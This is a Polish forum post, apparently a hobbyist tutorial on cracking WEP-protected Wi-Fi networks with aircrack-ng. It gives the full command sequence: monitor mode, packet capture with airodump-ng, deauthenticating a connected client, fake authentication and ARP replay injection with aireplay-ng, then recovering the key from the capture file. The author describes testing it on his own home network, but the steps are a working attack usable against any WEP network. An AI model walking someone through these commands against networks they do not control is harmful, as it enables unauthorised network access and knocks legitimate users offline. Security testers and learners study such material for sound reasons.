Je¶li już działa nam karta, to zabieramy się do akcji! (w razie problemów pisać poniżej ) ¦ci±gamy program aircrack-ng: Wersja 1.0 RC1
Rozpakowujemy, kompilujemy i instalujemy. Jak to zrobić?
Najlepiej by było, je¶li powyższe archiwum, umie¶ciliby¶cie nie na pulpicie, ale w Folderze Domowym. Będzie po prostu wygodniej. Rozpakowujemy... Otwieramy konsolę i wpisujemy:
Kod:
tar -zxvf aircrack-ng-1.0-rc1.tar.gz Pliki rozpakuj± się do katalogu aircrack-ng-1.0-rc1Kompilujemy...
cd aircrack-ng-1.0-rc1
Za pomoc± powyższego polecenia, przechodzimy do folderu z aircrackiem.
make
Teraz kompiluj± się komponenty aircrack. Instalujemy... Musimy to zrobić z konta superużytkownika. Jak to robimy? Najpierw wpisujemy
su
...a potem
make install
B±dĽ od razu wpisać...
sudo make install
Ok... Mamy zainstalowane, to teraz przechodzimy do sedna... Wszystkie polecenia wykonujemy z uprawnieniami superużytkownika!! Odpalamy kartę w trybie monitora. Nasz interfejs powinien nosić nazwę ath0.
airmon-ng start ath0
Je¶li to nie zadziała to wpisujemy "wifi0", b±dĽ "wlan0". W przypadku, gdyby¶cie nie mogli znaleĽć interfejsu, to wpiszcie
iwconfig
...a to polecenie automatycznie wyszuka interfejsy, które obsługuj± sieci bezprzewodowe. Robimy rozpoznanie w plenerze i wyszukujemy sieci, któr± chcemy testować i t±, któr± możemy testować. Zatem...
airodump-ng -c 2 -w test ath0
Ale co to znaczy? airodump-ng - nazwa programu, którego chcemy użyć -c - okre¶la kanał, na którym znajduje się sieć -w - okre¶la plik, w jakim będ± zachowywane przechwycone pakiety ath0 - nazwa intersejsu Je¶li w otoczeniu jest parę sieci na tym samym kanale, to musimy bardziej sprecyzować opcję przechwytywania, dodaj±c opcję
--bssid
...a po nim adres MAC sieci. Załóżmy, że BSSID (adres MAC sieci), to 00:0F:D8:98:CF:0A (wymy¶lony przeze mnie), czyli nasze polecenie, z t± rozszerzon± opcj± wygl±dałoby tak:
airodump-ng -c 2 --bssid 00:0F:D8:98:CF:0A -w test ath0
Może wydawać się nieco skomplikowane, ale je¶li kto¶ umie my¶leć, to zrozumie Czyli najpro¶ciej mówi±c... Polecenie to przechwytuje dane z kanału drugiego, z AP o adresie 00:0F:D8:98:CF:0A do pliku test, wykorzystuj±c przy tym interfejs ath0. Otwieramy kolejne 3 konsole, a powyższe polecenie niech nadal działa. Te polecenia najlepiej wpisywać szybko, jedno po drugim w osobnych konsolach. Polecam najpierw wypisanie sobie poleceń w edytorze tekstu, a potem wklejać po kolei te polecenia do konsol.
Dla mojej wygody pisania, a dla Waszej wygody czytania od razu ustalę adresy MAC poszczególnych urz±dzeń. BSSID (adres MAC Acess Point'a) - 00:0F:D8:98:CF:0A adres MAC naszej karty - 00:11:22:33:44:55 adres MAC komputera podł±czonego do zabezpieczonej sieci - 00:1A:2B:3C:4D:5E Opcji dodatkowych poleceń nie będę opisywać, będziecie się orientować po adresach MAC, jaka opcja do czego służy.
Najlepiej wpisywać w kolejno¶ci, w jakiej jest podane niżej, a raczej jest to nawet wskazane
aireplay-ng -0 0 -a 00:0F:D8:98:CF:0A -c 00:1A:2B:3C:4D:5E -h 00:11:22:33:44:55 ath0
Umożliwia wykonanie dwóch poniższych poleceń Wypuszcza pakiety, które co¶ tam deindentyfikuj±, ale to polecenie jest prawie, że niezbędne.
aireplay-ng -1 0 -a 00:0F:D8:98:CF:0A -h 00:11:22:33:44:55 ath0
Powyższe polecenie to fałszywa identyfikacja z AP. Efekt możecie obejrzeć w uruchomionym airodump-ng. Możemy zobaczyć siebie jako podł±czonych do routera, ale za nim rzeczywi¶cie się do niego podł±czymy, to musimy wykonać poniższe polecenie, które jest najbardziej czasochłonne.
aireplay-ng -3 -b 00:0F:D8:98:CF:0A -h 00:11:22:33:44:55 ath0
To polecenie wpuszcza pakiety. Je¶li wszystko pójdzie dobrze, to do¶ć szybko powinno nabijać się ARP. Podejrzyjcie sobie konsolę z airodump-ng. Jako #Data powinno być co najmniej 40000 pakietów, więc musicie poczekać zanim pakiety zostan± wstrzyknięte Gdy już mamy wystarczaj±c± ilo¶ć pakietów, to otwieramy kolejn± konsolę i wpisujemy:
aircrack-ng test-01.cap
Airodump-ng urozmaica nam trochę nazwę pliku. Z wybranego przez nas "test" modyfikuje go do "test-01.cap" Zawsze możecie obejrzeć jaka jest nazwa pliku w Folderze domowym. Klucz do sieci powinien się wyliczyć w dosłownie kilka sekund! Testowałem to w mojej domowej sieci z zabezpieczeniem WEP 64 bit, a potem z WEP 128 bit. Nie sprawdzałem WEP 256bit i WEP 512bit. Też powinno dać się złamać, tylko że będzie potrzebna większa ilo¶ć pakietów. W razie jakichkolwiek problemów proszę pisać pod spodem. Dziękuję za uwagę i przepraszam, że się tak rozpisałem, ale wszystko jest, mam nadzieję, porz±dnie wytłumaczone.
kamil151992